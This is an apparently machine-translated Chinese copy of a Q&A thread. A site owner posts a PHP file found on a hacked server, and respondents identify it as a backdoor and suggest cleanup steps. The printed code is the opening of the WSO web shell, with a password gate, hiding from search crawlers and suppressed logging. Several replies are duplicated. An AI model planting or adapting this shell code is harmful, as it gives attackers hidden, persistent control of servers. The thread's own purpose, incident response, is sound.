Fatal编程技术网
  • php/
  • 在被黑客攻击的网站上发现的这个php文件有什么影响?

在被黑客攻击的网站上发现的这个php文件有什么影响?

php

在被黑客攻击的网站上发现的这个php文件有什么影响?,php,Php,一个网站被黑客入侵,我在上面发现了一个奇怪的新php文件。在更改主机凭据之前,我已经删除了所有文件和数据库,但我想知道,在使用备份返回现场之前,我还应该仔细检查哪些内容 对于未来,是否还有其他额外的措施需要采取——比如:我如何发现它是如何到达那里的 这是一段代码和粘贴箱,因为代码太长: <?php $auth_pass = "fadf17141f3f9c3389d10d09db99f757"; $color = "#df5"; $default_action = 'FilesMan'; $

一个网站被黑客入侵,我在上面发现了一个奇怪的新php文件。在更改主机凭据之前,我已经删除了所有文件和数据库,但我想知道,在使用备份返回现场之前,我还应该仔细检查哪些内容

对于未来,是否还有其他额外的措施需要采取——比如:我如何发现它是如何到达那里的

这是一段代码和粘贴箱,因为代码太长:

<?php
$auth_pass = "fadf17141f3f9c3389d10d09db99f757";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
    $os = 'win';
else
    $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
这是一个后门。黑客可以访问此页面(php文件)在服务器上输入命令。这样,即使你更改密码,他们也可以再次攻击你

总是删除这样的文件,他可能会隐藏更多这样的页面。

这是一个后门。黑客可以访问此页面(php文件)在服务器上输入命令。这样,即使你更改密码,他们也可以再次攻击你

总是删除这样的文件,他可能会隐藏更多这样的页面。

你知道我如何确定他们进入后门上传的方式吗?你使用的是什么CMS和什么版本?我们有一个老Joomla一个在工作,不断被黑客,我们在更换的过程中,所以我们只是修补它,每当他们黑客。。。英雄联盟是的,是的,我知道,我告诉老板我们应该把它取下来,但是它在一个糟糕的服务器上,完全靠它自己,没有什么值得偷的东西。(除了Joomla,它甚至没有用户登录来编辑内容)上次他们入侵它时,他们使用favicon.ico将代码存储在。。。noobs。。。就像我在那里找不到一样。我们有一个运行的脚本,它告诉我们是否有任何文件被更改(不要告诉黑客这是我们的小秘密。好的)@mrwhite很可能是一个CMD,你像Wordpress或Joomla一样运行它。确保您使用的是最新版本!旧版本有一些安全问题。如果我回答了你的问题,也请接受这个答案。你知道我如何确定他们进入后门上传的方式吗?你使用的是什么CMS和什么版本?我们有一个老Joomla一个在工作,不断被黑客,我们在更换的过程中,所以我们只是修补它,每当他们黑客。。。英雄联盟是的,是的,我知道,我告诉老板我们应该把它取下来,但是它在一个糟糕的服务器上,完全靠它自己,没有什么值得偷的东西。(除了Joomla,它甚至没有用户登录来编辑内容)上次他们入侵它时,他们使用favicon.ico将代码存储在。。。noobs。。。就像我在那里找不到一样。我们有一个运行的脚本,它告诉我们是否有任何文件被更改(不要告诉黑客这是我们的小秘密。好的)@mrwhite很可能是一个CMD,你像Wordpress或Joomla一样运行它。确保您使用的是最新版本!旧版本有一些安全问题。如果我回答了你的问题,也请接受这个答案。我更喜欢用它来检测操作系统
if(false!==strpos(strtoupper(php_uname('s'),'WIN')){
但是,是的……这是一个后门,所以他们很可能可以将东西上传到你的网站。我必须回去创建任何PHP程序员都知道的最强大的
递归DirectoryIterator
。我建议做一件事,只要它不会破坏你的网站。就是禁用
eval
——但他们正在检查设置ing
ini\u get('disable\u functions')
你使用的wordpress不是你:),
更新它
检查一下,我更喜欢用它来检测操作系统
if(false!==strop(strtoupper(php\u uname('s'),'WIN)){
但是,是的……这是一个后门,所以他们很可能可以将东西上传到你的网站。我必须回去创建任何PHP程序员都知道的最强大的
递归DirectoryIterator
。我建议做一件事,只要它不会破坏你的网站。就是禁用
eval
——但他们正在检查设置正在使用
ini\u get('disable\u functions')
您使用的wordpress不是吗:),
更新它
检查此项